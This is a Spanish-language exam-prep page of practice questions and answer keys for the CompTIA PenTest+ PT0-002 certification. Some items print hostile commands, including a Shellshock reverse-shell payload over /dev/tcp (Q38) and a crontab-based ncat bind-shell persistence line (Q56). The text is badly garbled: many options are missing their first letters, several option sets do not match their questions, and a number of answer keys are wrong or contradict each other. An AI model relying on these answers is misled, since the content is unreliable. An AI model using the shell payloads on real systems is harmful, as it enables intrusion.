¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Últimas preguntas del examen CompTIA PenTest+ PT0-002 para una preparación eficaz

Nuestra amplia colección de preguntas y respuestas de examen, preguntas de examen cuidadosamente elaboradas y valiosos recursos de examen están aquí para ayudarle en su camino. Prepárese con confianza utilizando nuestros completos materiales de estudio, diseñados para cubrir todos los temas clave evaluados en el examen. Desde metodologías de pruebas de penetración hasta evaluación y gestión de vulnerabilidades, nuestros recursos están diseñados para mejorar su comprensión e impulsar su preparación para el examen. La práctica hace al maestro, y nuestros exámenes de prueba son la herramienta perfecta para evaluar sus conocimientos y simular el entorno del examen. Identifique sus puntos fuertes y débiles, perfeccione sus habilidades y afronte el día del examen con confianza. Con nuestra guía experta y materiales de estudio de primera clase, estará bien equipado para aprobar el examen CompTIA PenTest+ PT0-002 y llevar su carrera en ciberseguridad a nuevas alturas. Comience a prepararse hoy para una experiencia de examen exitosa
Realizar otros exámenes en línea

Cuestionar #1
Un probador de penetración descubrió una vulnerabilidad que proporciona la capacidad de subir a una ruta a través de discovery traversal. Algunos de los archivos que se descubrieron a través de esta vulnerabilidad son:¿Cuál de los siguientes es el MEJOR método para ayudar a un atacante a obtener acceso interno a la máquina afectada?
A. Si los datos sensibles de los clientes son de acceso público
B. Si la conexión entre la nube y el cliente es segura
C. i los empleados del cliente han recibido la formación adecuada para utilizar la plataforma
D. Si las aplicaciones en la nube se desarrollaron utilizando un SDLC seguro
Ver respuesta
Respuesta correcta: C
Cuestionar #2
Una empresa de software ha contratado a un consultor de seguridad para evaluar la seguridad de las prácticas de desarrollo de software de la empresa. El consultor opta por comenzar el reconocimiento realizando un "fuzzing" en un binario de software. ¿Cuál de las siguientes vulnerabilidades es MÁS probable que identifique el consultor de seguridad?
A. Esquemas de autenticación débiles
B. redenciales almacenadas en cadenas
C. Desbordamientos de búfer
D. Gestión de recursos no optimizada
Ver respuesta
Respuesta correcta: C
Cuestionar #3
¿Cuál de los siguientes tipos de información se incluiría MÁS probablemente en un informe de evaluación de la seguridad de las aplicaciones dirigido a los desarrolladores? (Elija dos.)
A. ydra
B. ohn el Destripador
C. aín y Abel
D. Medusa
Ver respuesta
Respuesta correcta: BC
Cuestionar #4
A una persona que realiza pruebas de penetración se le ha asignado la tarea de atacar una serie de objetivos en el rango 192.168.1.0/24, activando el menor número posible de alarmas y contramedidas. ¿Cuál de las siguientes sintaxis de análisis de Nmap sería la MEJOR para lograr este objetivo?
A. map ג€"sT ג€"vvv ג€"O 192
B. map ג€"sV 192
C. map ג€"sA ג€"v ג€"O 192
D. map ג€"sS ג€"O 192
Ver respuesta
Respuesta correcta: D
Cuestionar #5
Un evaluador de penetración está limpiando y cubriendo huellas al finalizar una prueba de penetración. ¿Cuál de los siguientes elementos debe asegurarse de eliminar del sistema? (Elija dos.)
A. Conchas desovadas
B. Cuentas de usuario creadas
C. Registros del servidor
D. Cuentas de administrador
E. Reiniciar el sistema
F. Caché ARP
Ver respuesta
Respuesta correcta: BC
Cuestionar #6
Una empresa de servicios de correo ha contratado a un probador de penetración para llevar a cabo una enumeración de todas las cuentas de usuario en un servidor SMTP para identificar si las cuentas de miembros del personal anteriores siguen activas. ¿Cuál de los siguientes comandos se debe utilizar para lograr el objetivo?
A. RFY y EXPN
B. RFY y TURN
C. XPN y TURN
D. CPT TO y VRFY
Ver respuesta
Respuesta correcta: A
Cuestionar #7
Un probador de penetración descargó un archivo de aplicación Java de un servidor web comprometido e identifica cómo invocarlo mirando el siguiente registro:¿Cuál de los siguientes es el orden de los pasos que debe seguir el probador de penetración para validar si la aplicación Java utiliza cifrado a través de sockets?
A. Ejecute un análisis de vulnerabilidades de la aplicación y, a continuación, identifique los puertos TCP utilizados por la aplicación
B. Ejecute la aplicación conectada a un depurador y, a continuación, revise el registro de la aplicación
C. Desensamblar el código binario y luego identificar los puntos de rupturA
D. Inicie una captura de paquetes con Wireshark y luego ejecute la aplicación
Ver respuesta
Respuesta correcta: D
Cuestionar #8
Un probador de penetración completó una evaluación, eliminó todos los artefactos y cuentas creados durante la prueba, y presentó los resultados al cliente. ¿Cuál de las siguientes acciones tiene lugar a continuación?
A. El probador de penetración lleva a cabo una nueva pruebA
B. l probador de penetración elimina todos los scripts de las máquinas cliente
C. l cliente aplica parches a los sistemas
D. El cliente borra los registros del sistema generados durante la pruebA
Ver respuesta
Respuesta correcta: C
Cuestionar #9
¿Cuál de las siguientes situaciones requeriría que un evaluador de la penetración notificara el compromiso al contacto de emergencia?
A. El equipo explota un servidor crítico dentro de la organización
B. l equipo exfiltra PII o datos de tarjetas de crédito de la organización
C. l equipo pierde el acceso a la red de forma remotA
D. l equipo descubre otro actor en un sistema de la red
Ver respuesta
Respuesta correcta: D
Cuestionar #10
Un evaluador de intrusiones está explicando el marco ATT&CK de MITRE al asesor jurídico jefe de una empresa. ¿Cuál de las siguientes opciones describiría MÁS probablemente el evaluador como una ventaja del marco?
A.
B. os scripts que forman parte del marco pueden importarse directamente a las herramientas SIEM
C. a metodología puede utilizarse para estimar mejor el coste de un incidente
D. El marco es estático y garantiza la estabilidad de un programa de seguridad a lo largo del tiempo
Ver respuesta
Respuesta correcta: A
Cuestionar #11
¿Cuál de los siguientes conceptos define el conjunto específico de pasos y enfoques que se llevan a cabo durante una prueba de penetración?
A. etalles del ámbito de aplicación
B. Conclusiones
C. etodología
D. Declaración de trabajo
Ver respuesta
Respuesta correcta: C
Cuestionar #12
Un probador de penetración encontró la siguiente URL válida mientras realizaba una evaluación manual de una aplicación web: http://www.example.com/product.php?id=123987.Which de las siguientes herramientas automatizadas sería mejor utilizar PRÓXIMAMENTE para tratar de identificar una vulnerabilidad en esta URL?
A. QLmap
B. essus
C. ikto
D. irBuster
Ver respuesta
Respuesta correcta: A
Cuestionar #13
Un especialista en pruebas de penetración ha realizado un análisis de vulnerabilidades en un servidor web y ha identificado una vulnerabilidad única pero grave. ¿Cuál de las siguientes es la MEJOR manera de asegurarse de que se trata de un resultado positivo verdadero?
A. jecute otro escáner para comparar
B. ealizar una prueba manual en el servidor
C. omprueba los resultados en el escáner
D. Busca la vulnerabilidad en Internet
Ver respuesta
Respuesta correcta: B
Cuestionar #14
DRAG DROP (Drag and Drop no es compatible)Durante una prueba de penetración, usted obtiene acceso a un sistema con una interfaz de usuario limitada. Esta máquina parece tener acceso a una red aislada a la que le gustaría escanear puertos.INSTRUCCIONESAnalice los segmentos de código para determinar qué secciones son necesarias para completar un script de escaneo de puertos.Arrastre los elementos apropiados a las ubicaciones correctas para completar el script.Si en algún momento desea volver al estado inicial de la simulación, haga clic en el botón Re
A. Consulte la respuesta en la sección Explicación
Ver respuesta
Respuesta correcta: A
Cuestionar #15
Un probador de penetración está probando una nueva versión de una aplicación móvil en un entorno sandbox. Para interceptar y descifrar el tráfico entre la aplicación y la API externa, el probador ha creado una CA raíz privada y ha emitido un certificado desde ella. Aunque el probador instaló la CA raíz en la piedra de confianza del smartphone utilizado para las pruebas, la aplicación muestra un error que indica una falta de coincidencia de certificados y no se conecta al servidor. ¿Cuál de las siguientes es la razón MÁS probable para que
A. l puerto TCP 443 no está abierto en el cortafuegos
B. El servidor API está utilizando SSL en lugar de TLS
C. El probador está utilizando una versión obsoleta de la aplicación
D. a aplicación tiene el certificado API anclado
Ver respuesta
Respuesta correcta: D
Cuestionar #16
Una empresa de investigación privada solicita una prueba de penetración para determinar la probabilidad de que los atacantes puedan acceder a dispositivos móviles y, a continuación, extraer datos de dichos dispositivos. Cuál de los siguientes es un método de ingeniería social que, de tener éxito, permitiría con MAYOR probabilidad ambos objetivos?
A. nviar un SMS con un número de servicio falsificado que incluya un enlace para descargar una aplicación maliciosA
B. xplotar una vulnerabilidad en el MDM y crear una nueva cuenta y perfil de dispositivo
C. Realizar vishing en la mesa de ayuda de TI para recopilar una lista de IMEIs de dispositivos aprobados para enmascarar
D. Infestar un sitio web utilizado a menudo por los empleados con malware dirigido a arquitecturas x86
Ver respuesta
Respuesta correcta: A
Cuestionar #17
Un profesional de la seguridad quiere probar un dispositivo IoT enviando un paquete no válido a un servicio propietario que escucha en el puerto TCP 3011. Cuál de las siguientes opciones permitiría al profesional de la seguridad manipular fácilmente y mediante programación la longitud de la cabecera TCP y la suma de comprobación utilizando números arbitrarios y observar cómo responde el servicio propietario?
A. map
B. cpdump
C. capy
D. ping3
Ver respuesta
Respuesta correcta: C
Cuestionar #18
Un probador de penetración ha establecido una posición de ataque en ruta y ahora debe elaborar especialmente una respuesta de consulta DNS para ser enviada de vuelta a un host de destino
A. ocat
B. cpdump
C. capy
D. cavar
Ver respuesta
Respuesta correcta: C
Cuestionar #19
¿Cuál de los siguientes aspectos es el que MÁS le interesaría ver al equipo de caza de una empresa en un informe final?
A. esumen ejecutivo
B. TTPs de ataque
C. etodología
D. Detalles del ámbito de aplicación
Ver respuesta
Respuesta correcta: B
Cuestionar #20
Un evaluador de penetración que está realizando una evaluación solicitada por la empresa desea enviar tráfico a otro sistema utilizando doble etiquetado
A. lonación RFID
B. tiquetado RFID
C. Metaetiquetado
D. Anidamiento de etiquetas
Ver respuesta
Respuesta correcta: D
Cuestionar #21
Un Director de Seguridad de la Información quiere que un especialista en pruebas de penetración evalúe el nivel de concienciación en materia de seguridad de los empleados de la empresa
A. etasploit
B. ydra
C. ET
D. PScan
Ver respuesta
Respuesta correcta: C
Cuestionar #22
Una empresa contrató a un equipo de pruebas de penetración para revisar los sistemas ciberfísicos de una planta de fabricación. El equipo descubrió inmediatamente que tanto los sistemas de supervisión como los PLC están conectados a la intranet de la empresa
A. Los PLCs no actuarán sobre comandos inyectados a través de la red
B. Los supervisores y controladores están en una red virtual separada por defecto
C. Los controladores no validarán el origen de los comandos
D. Los sistemas de supervisión detectarán una inyección maliciosa de código/comandos
Ver respuesta
Respuesta correcta: C
Cuestionar #23
Un probador de penetración escribe el siguiente script: ¿Cuál de las siguientes acciones está realizando el probador?
A. úsqueda de vulnerabilidades del servicio
B. ntentar recuperar un bind shell perdido
C. onstruir un shell inverso escuchando en los puertos especificados
D. scanear una red en busca de puertos abiertos específicos
Ver respuesta
Respuesta correcta: D
Cuestionar #24
Se ha contratado a un probador de penetración para realizar una prueba de penetración física para acceder a una sala segura dentro del edificio de un cliente. El reconocimiento exterior identifica dos entradas, una red WiFi para invitados y varias cámaras de seguridad conectadas a Internet
A. Vigilancia
B. hodan
C. econ-ng
D. ircrack-ng
Ver respuesta
Respuesta correcta: B
Cuestionar #25
Un escaneo Nmap muestra puertos abiertos en servidores web y bases de datos. Un evaluador de penetración decide ejecutar WPScan y SQLmap para identificar vulnerabilidades e información adicional sobre esos sistemas
A. escubrir posibles actividades delictivas basándose en las pruebas recopiladas
B. dentificar todas las vulnerabilidades del entorno
C. imitar la invasividad en función del ámbito de aplicación
D. antener la confidencialidad de los resultados
Ver respuesta
Respuesta correcta: B
Cuestionar #26
Una empresa ha contratado a un especialista en pruebas de penetración para que instale y configure un punto de acceso fraudulento en la red. ¿Cuál de las siguientes es la MEJOR herramienta para lograr este objetivo?
A. ireshark
B. ircrack-ng
C. ismet
D. ifite
Ver respuesta
Respuesta correcta: B
Cuestionar #27
Un escaneo de red Nmap ha encontrado cinco puertos abiertos con servicios identificados. Cuál de las siguientes herramientas debe utilizar un probador de penetración NEXT para determinar si existe alguna vulnerabilidad con exploits asociados en los puertos abiertos?
A. penVAS
B. rozer
C. uite eructo
D. WASP ZAP
Ver respuesta
Respuesta correcta: A
Cuestionar #28
Un probador de penetración obtiene acceso a un sistema y establece la persistencia y, a continuación, ejecuta los siguientes comandos:¿Cuál de las siguientes acciones es MÁS probable que realice el probador?
A. edireccionando el historial de Bash a /dev/null
B. acer una copia del historial de Bash del usuario para su posterior enumeración
C. ubrir huellas borrando el historial de Bash
D. Crear archivos señuelo en el sistema para confundir a los que responden al incidente
Ver respuesta
Respuesta correcta: C
Cuestionar #29
Un probador de penetración escribe la siguiente secuencia de comandos: ¿Cuál de los siguientes objetivos intenta alcanzar el probador?
A. eterminar los hosts activos en la red
B. stablecer el TTL de los paquetes ping para el sigilo
C. ellenar la tabla ARP de los dispositivos conectados en red
D. scanear el sistema en los puertos más utilizados
Ver respuesta
Respuesta correcta: A
Cuestionar #30
Un probador de penetración obtiene acceso a un sistema y establece la persistencia y, a continuación, ejecuta los siguientes comandos:¿Cuál de las siguientes acciones es MÁS probable que realice el probador?
A. edireccionando el historial de Bash a /dev/null
B. acer una copia del historial de Bash del usuario para su posterior enumeración
C. ubrir huellas borrando el historial de Bash
D. Crear archivos señuelo en el sistema para confundir a los que responden al incidente
Ver respuesta
Respuesta correcta: C
Cuestionar #31
Un probador de penetración necesita acceder a un edificio vigilado por puertas cerradas, un equipo de seguridad y cámaras. Cuál de las siguientes es una técnica que el probador puede utilizar para acceder a la estructura de TI sin ser detectado?
A. Forzar una cerradurA
B. esactivar las cámaras de forma remotA
C. Hacerse pasar por un repartidor de paquetes
D. Enviar un correo electrónico de phishing
Ver respuesta
Respuesta correcta: C
Cuestionar #32
Después de obtener acceso a un sistema anterior, un probador de penetración ejecuta una exploración Nmap contra una red con los siguientes resultados:El probador ejecuta entonces el siguiente comando desde el sistema explotado anteriormente, que falla:¿Cuál de los siguientes explica la razón por la que el comando falló?
A. xploración activa
B. ing barrer
C. nulación del protocolo
D. Análisis de paquetes
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Un probador de penetración está evaluando una red inalámbrica. A pesar de monitorizar el canal y el SSID correctos, el probador es incapaz de capturar un apretón de manos entre los clientes y el AP. ¿Cuál de los siguientes ataques es el MÁS efectivo para permitir al probador de penetración capturar un apretón de manos?
A. einstalación de la llave
B. Desautenticación
C. emelo malvado
D. Repetición
Ver respuesta
Respuesta correcta: B
Cuestionar #34
Un probador de penetración recibió un bloque de red de 16 bits que fue evaluado. Durante la evaluación, el evaluador se dio cuenta de que no había ningún host activo en el bloque de IPs proporcionado e informó de ello a la empresa. La empresa proporcionó entonces un bloque actualizado de IPs al evaluador. ¿Cuál de los siguientes sería el SIGUIENTE paso más apropiado?
A. escindir el contrato
B. ctualizar las ROE con nuevas firmas
C. scanear el bloque de 8 bits para mapear hosts perdidos adicionales
D. ontinuar la evaluación
Ver respuesta
Respuesta correcta: B
Cuestionar #35
Un probador de penetración es capaz de capturar el tráfico NTLM desafío-respuesta entre un cliente y un servidor.¿Cuál de los siguientes se puede hacer con el pcap para obtener acceso al servidor?
A. ealizar una escalada vertical de privilegios
B. eproducir el tráfico capturado al servidor para recrear la sesión
C. tiliza John the Ripper para descifrar la contraseñA
D. Utilizar un ataque pass-the-hash
Ver respuesta
Respuesta correcta: D
Cuestionar #36
¿Cuál de las siguientes opciones describe MEJOR el Top 10 de OWASP? (Elija dos.)
A. os riesgos más críticos de las aplicaciones web
B. na lista de todos los riesgos de las aplicaciones web
C. os riesgos definidos por orden de importancia
D. Una norma de seguridad para aplicaciones web
E. Marco de gestión de riesgos y cumplimiento
F. Lista de comprobación de las vulnerabilidades de Apache
Ver respuesta
Respuesta correcta: AC
Cuestionar #37
Un consultor está revisando la siguiente salida después de los informes de problemas de conectividad intermitentes:¿Cuál de los siguientes es MÁS probable que sea reportado por el consultor?
A. Un dispositivo de la red tiene una dirección IP en una subred incorrectA
B. Se ha iniciado una sesión multicast utilizando un grupo multicast incorrecto
C. n ataque de inundación ARP está utilizando la dirección de difusión para realizar DDoS
D. Un dispositivo en la red ha envenenado la caché ARP
Ver respuesta
Respuesta correcta: D
Cuestionar #38
Un probador de penetración descubre un servidor web vulnerable en 10.10.1.1. A continuación, el probador edita un script Python que envía un exploit web y se encuentra con el siguiente código: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}¿Cuál de las siguientes ediciones debería hacer el probador en el script para determinar el contexto de usuario en el que se está ejecutando el servidor?
A. xploit = {ג€User-Agentג€: ג€() { ignorored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. xploit = {ג€User-Agentג€: ג€() { ignorored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. xploit = {ג€User-Agentג€: ג€() {ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. xploit = {ג€User-Agentג€: ג€() { ignorored;};/bin/bash -i>& /dev/tcp/10
Ver respuesta
Respuesta correcta: A
Cuestionar #39
Un probador que está realizando una prueba de penetración en un sitio web recibe la siguiente salida:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62¿Cuál de los siguientes comandos se puede utilizar para seguir atacando el sitio web?
A. Obtener acceso al host de destino e implantar malware especialmente diseñado para este fin
B. Explotar el servidor DNS local y añadir/actualizar los registros de zona con un registro A falsificado
C. Utilizar la utilidad Scapy para sobrescribir los campos de resolución de nombres en la respuesta de la consulta DNS
D. Proxy HTTP conexiones desde el host de destino a la del host suplantado
Ver respuesta
Respuesta correcta: D
Cuestionar #40
Un especialista en pruebas de penetración que está realizando una evaluación de seguridad descubre que una vulnerabilidad crítica está siendo explotada activamente por ciberdelincuentes
A. óngase en contacto con el principal punto de contacto
B. ntenta derribar a los atacantes
C. lame inmediatamente a las fuerzas del orden
D. ecopilar las pruebas adecuadas y añadirlas al informe final
Ver respuesta
Respuesta correcta: A
Cuestionar #41
¿Cuál de las siguientes opciones es la MÁS importante que debe incluirse en el informe final de una prueba estática de seguridad de aplicaciones redactada para un equipo de desarrolladores de aplicaciones?
A. esumen ejecutivo de los métodos de pruebas de penetración utilizados
B. ista de materiales, incluidos suministros, subcontratos y costes incurridos durante la evaluación
C. Evaluación cuantitativa del impacto en caso de que el software se vea comprometido
D. ontexto de código para instancias de operaciones de typecasting inseguras
Ver respuesta
Respuesta correcta: C
Cuestionar #42
Un probador de penetración escribió el siguiente script para ser utilizado en un compromiso:¿Cuál de las siguientes acciones realizará este script?
A. ealizar una nueva prueba de penetración
B. emediar los hallazgos
C. roporcionar la lista de vulnerabilidades y exposiciones comunes
D. Ampliar el alcance de la prueba de penetración
Ver respuesta
Respuesta correcta: A
Cuestionar #43
Al desarrollar un script de shell destinado a ser interpretado en Bash, debe especificarse explícitamente el intérprete /bin/bash. ¿Cuál de las siguientes combinaciones de caracteres debe utilizarse en la primera línea del script para lograr este objetivo?
A. #
B. $
C. #
D. $
E. E
Ver respuesta
Respuesta correcta: E
Cuestionar #44
Un probador de penetración quiere encontrar información oculta en documentos disponibles en la web en un dominio concreto. ¿Cuál de las siguientes opciones debería utilizar?
A. etcraft
B. entralOps
C. esponder
D. OCA
Ver respuesta
Respuesta correcta: D
Cuestionar #45
Una prueba de penetración basada en el cumplimiento se ocupa principalmente de:
A. Obtención de IIP de la red protegidA
B. saltarse la protección de los dispositivos de borde
C. Determinar la eficacia de un conjunto específico de normas de seguridad
D. btener información específica de la red protegidA
Ver respuesta
Respuesta correcta: C
Cuestionar #46
Una empresa utiliza un proveedor de nube con ancho de banda de red compartido para alojar una aplicación web en servidores dedicados. El contacto de la empresa con el proveedor de la nube evita cualquier actividad que pudiera interferir con los otros clientes del proveedor de la nube. Al contratar a una empresa de pruebas de penetración para probar la aplicación, ¿cuál de las siguientes medidas debe evitar la empresa?
A. Rastreo de las URL de la aplicación web en busca de vulnerabilidades
B. Fingerprinting de todas las direcciones IP de los servidores de la aplicación
C. Forzar las contraseñas de la aplicación
D. Enviar muchas peticiones web por segundo para probar la protección DDoS
Ver respuesta
Respuesta correcta: D
Cuestionar #47
Un probador de penetración ejecutó un simple escáner basado en Python. A continuación se muestra un fragmento del código: ¿Cuál de las siguientes opciones describe MEJOR por qué este script activó una alerta de `probable port scan` en el IDS de la organización?
A. ock
B. range(1, 1025) en la línea 1 rellenó la lista portList en orden numérico
C. a línea 6 utiliza socket
D. a variable remoteSvr no ha sido ni type-hinted ni inicializadA
Ver respuesta
Respuesta correcta: B
Cuestionar #48
¿Cuál de los siguientes documentos debe firmarse entre el evaluador y el cliente para regular la gestión de la información facilitada antes, durante y después del encargo?
A. SA
B. DA
C. OW
D. OE
Ver respuesta
Respuesta correcta: B
Cuestionar #49
Un probador de penetración ejecuta el comando unshadow en una máquina. ¿Cuál de las siguientes herramientas es más probable que el probador utilice PRÓXIMAMENTE?
A. ohn el Destripador
B. ydra
C. imikatz
D. Caín y Abel
Ver respuesta
Respuesta correcta: A
Cuestionar #50
Un probador de penetración está realizando una prueba de penetración. El probador obtiene un shell de nivel raíz en un servidor Linux y descubre los siguientes datos en un archivo llamado password.txt en el directorio /home/svsacct:U3VQZXIkM2NyZXQhCg==¿Cuál de los siguientes comandos debe utilizar el probador NEXT para descifrar el contenido del archivo?
A. cho U3VQZXIkM2NyZXQhCg== | base64 ג€"d
B. ar zxvf contraseñA
C. ydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192
D. ohn --wordlist /usr/share/seclists/rockyou
Ver respuesta
Respuesta correcta: A
Cuestionar #51
Durante una misión, un evaluador de penetración encontró la siguiente lista de cadenas dentro de un archivo: ¿Cuál de las siguientes es la MEJOR técnica para determinar el texto plano conocido de las cadenas?
A. taque de diccionario
B. taque a la mesa arco iris
C. taque de fuerza bruta
D. Ataque de relleno de credenciales
Ver respuesta
Respuesta correcta: B
Cuestionar #52
Un probador de penetración se está preparando para realizar actividades para un cliente que requieren una interrupción mínima de las operaciones de la empresa.¿Cuáles de las siguientes se consideran herramientas de reconocimiento pasivo? (Elija dos.)
A. map -P0 -T0 -sS 192
B. map -sA -sV --host-timeout 60 192
C. map -f --badsum 192
D. map -A -n 192
Ver respuesta
Respuesta correcta: AE
Cuestionar #53
A una empresa le preocupa que su proveedor de servicios en la nube no proteja adecuadamente las máquinas virtuales que albergan su software de desarrollo. Las máquinas virtuales están alojadas en un centro de datos con otras empresas que comparten recursos físicos. ¿Cuál de los siguientes tipos de ataque es el MÁS preocupante para la empresa?
A. Inundación de datos
B. esión de equitación
C. Ciberocupación
D. Canal lateral
Ver respuesta
Respuesta correcta: D
Cuestionar #54
Un probador de penetración está examinando una red Clase C para identificar sistemas activos rápidamente. Cuál de los siguientes comandos debe utilizar el probador de penetración?
A. map -sn 192
B. map -sn 192
C. map -sn 192
D. map -sN 192
Ver respuesta
Respuesta correcta: B
Cuestionar #55
¿Cuál de las siguientes opciones describe la razón por la que un probador de penetración ejecutaría el comando sdelete mimikatz. * en un servidor Windows que el probador comprometió?
A. ara eliminar las entradas de registro de hash-cracking
B. ara eliminar la cuenta Mimikatz creada por el probador
C. ara eliminar herramientas del servidor
D. Para eliminar un shell inverso del sistema
Ver respuesta
Respuesta correcta: C
Cuestionar #56
Un probador de penetración fue capaz de obtener acceso con éxito a una estación de trabajo de Windows en el ordenador portátil de un cliente móvil.¿Cuál de los siguientes se puede utilizar para asegurar que el probador es capaz de mantener el acceso al sistema?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo ?€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash?€) | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 usuario
Ver respuesta
Respuesta correcta: C
Cuestionar #57
¿Cuál de las siguientes opciones proporciona una suite de explotación con módulos de carga útil que cubren la gama más amplia de tipos de sistemas objetivo?
A. essus
B. etasploit
C. uite eructo
D. thercap
Ver respuesta
Respuesta correcta: B
Cuestionar #58
Una empresa utiliza un proveedor de nube con ancho de banda de red compartido para alojar una aplicación web en servidores dedicados. El contacto de la empresa con el proveedor de la nube evita cualquier actividad que pudiera interferir con los otros clientes del proveedor de la nube. Al contratar a una empresa de pruebas de penetración para probar la aplicación, ¿cuál de las siguientes medidas debe evitar la empresa?
A. Rastreo de las URL de la aplicación web en busca de vulnerabilidades
B. uella digital de todas las direcciones IP de los servidores de la aplicación
C. orzar las contraseñas de la aplicación
D. nvío de muchas peticiones web por segundo para probar la protección DDoS
Ver respuesta
Respuesta correcta: D
Cuestionar #59
¿Cuál de las siguientes proporciona una matriz de tácticas y técnicas comunes utilizadas por los atacantes junto con las mitigaciones recomendadas?
A. IST SP 800-53
B. op 10 de OWASP
C. arco ATT&CK de MITRE
D. irectrices técnicas PTES
Ver respuesta
Respuesta correcta: C
Cuestionar #60
Un probador de penetración está revisando los siguientes resultados de reconocimiento de DNS para comptia.org desde dig:...;; SECCIÓN DE RESPUESTAScomptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX nuevo.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org. ¿Cuál de los siguientes problemas potenciales puede identificar el probador de penetración basándose en este resultado?
A. Al menos uno de los registros está fuera del ámbito de aplicación
B. Hay un registro MX duplicado
C. l registro NS no está dentro del dominio apropiado
D. os registros SOA fuera del dominio comptiA
Ver respuesta
Respuesta correcta: A
Cuestionar #61
¿Cuál de los siguientes aspectos debe tener en cuenta PRIMERO una persona que realiza pruebas de penetración en un entorno de nube?
A. Si el proveedor de servicios en la nube permite al evaluador de la penetración probar el entorno
B. Si la aplicación está utilizando los servicios en nube específicos
C. La ubicación geográfica donde se ejecutan los servicios en nube
D. Si el país en el que se encuentra el servicio en la nube tiene leyes que lo impidan
Ver respuesta
Respuesta correcta: A
Cuestionar #62
Un evaluador de penetración ejecutó un análisis Nmap en un dispositivo de red orientado a Internet con la opción -F y encontró algunos puertos abiertos. Para realizar una enumeración más detallada, el evaluador ejecutó otra exploración utilizando el siguiente comando: nmap -O -A -sS -p- 100.100.100.50Nmap devolvió que los 65.535 puertos estaban filtrados¿Cuál de las siguientes opciones es MÁS probable que se produjera en la segunda exploración?
A. n firewall o IPS bloqueó el escaneo
B. l probador de penetración utilizó banderas no soportadas
C. l dispositivo de red de borde se desconectó
D. El escaneo devolvió respuestas eco ICMP
Ver respuesta
Respuesta correcta: A
Cuestionar #63
¿Cuál de los siguientes aspectos debe tener en cuenta PRIMERO una persona que realiza pruebas de penetración en un entorno de nube?
A. Si el proveedor de servicios en la nube permite al probador de penetración probar el entorno
B. Si los servicios en nube específicos están siendo utilizados por la aplicación
C. La ubicación geográfica donde se ejecutan los servicios en nube
D. Si el país en el que está basado el servicio en nube tiene alguna ley que lo impida
Ver respuesta
Respuesta correcta: C
Cuestionar #64
Un asesor quiere ejecutar un escaneo Nmap lo más silenciosamente posible. Cuál de los siguientes comandos dará la MENOR probabilidad de detección?
A. usque puertos abiertos
B. scuchar una concha inversA
C. ntento de inundar puertos abiertos
D. Crear un túnel cifrado
Ver respuesta
Respuesta correcta: C
Cuestionar #65
Un probador de penetración recibió un archivo .pcap para buscar credenciales para utilizar en un compromiso. ¿Cuál de las siguientes herramientas debe utilizar el probador para abrir y leer el archivo .pcap?
A. map
B. ireshark
C. etasploit
D. etcat
Ver respuesta
Respuesta correcta: B
Cuestionar #66
Un probador de penetración ejecuta un escaneo contra un servidor y obtiene la siguiente salida:¿Cuál de las siguientes secuencias de comandos debe probar el probador de penetración SIGUIENTE?
A. tp 192
B. mbclient \\\\\\\\WEB3\\\\IPC$ -I 192
C. crack -u Administrador -P 15worst_passwords
D. url -X TRACE https://192
Ver respuesta
Respuesta correcta: A
Cuestionar #67
Un evaluador de penetración fue capaz de recopilar hashes MD5 de un servidor y crackear los hashes fácilmente con tablas rainbow.¿Cuál de las siguientes debe incluirse como recomendación en el informe de remediación?
A. Requisitos algorítmicos más estrictos
B. ontroles de acceso en el servidor
C. ifrado de las contraseñas de los usuarios
D. Un programa de gestión de parches
Ver respuesta
Respuesta correcta: A
Cuestionar #68
Un probador de penetración está evaluando el perímetro de la red de una empresa. El probador ha recibido información limitada sobre los controles defensivos o contramedidas, y existe un conocimiento interno limitado de las pruebas. ¿Cuál de los siguientes debería ser el PRIMER paso para planificar las actividades de reconocimiento?
A. anzar un escaneo externo de netblocks
B. Compruebe los registros WHOIS y netblock de la empresA
C. tilizar búsquedas DNS y excavar para determinar los hosts externos
D. ealizar un barrido ping de los netblocks de la empresA
Ver respuesta
Respuesta correcta: B
Cuestionar #69
Durante una prueba de penetración, un probador es capaz de cambiar los valores de la URL de ejemplo.com/login.php?id=5 a ejemplo.com/login.php?id=10 y obtener acceso a una aplicación web. ¿Cuál de las siguientes vulnerabilidades ha explotado el probador de penetración?
A. Inyección de comandos
B. Autenticación defectuosa
C. Referencia directa al objeto
D. Secuencias de comandos en sitios cruzados
Ver respuesta
Respuesta correcta: B
Cuestionar #70
Un probador de penetración lleva a cabo una exploración Nmap contra un objetivo y recibe los siguientes resultados:¿Cuál de los siguientes debe utilizar el probador para redirigir las herramientas de exploración utilizando el puerto TCP 1080 en el objetivo?
A. essus
B. adenasProxy
C. WASP ZAP
D. Imperio
Ver respuesta
Respuesta correcta: B
Cuestionar #71
¿Cuál de las siguientes herramientas sería la MÁS útil para recopilar información sobre proveedores y otra información relevante para la seguridad de los dispositivos IoT con el fin de respaldar el reconocimiento pasivo?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
Ver respuesta
Respuesta correcta: B
Cuestionar #72
Un ingeniero de seguridad identificó un nuevo servidor en la red y quiere escanear el host para determinar si está ejecutando una versión aprobada de Linux y una versión parcheada de Apache. ¿Cuál de los siguientes comandos realizará esta tarea?
A. map ג€"f ג€"sV ג€"p80 192
B. map ג€"sS ג€"sL ג€"p80 192
C. map ג€"A ג€"T4 ג€"p80 192
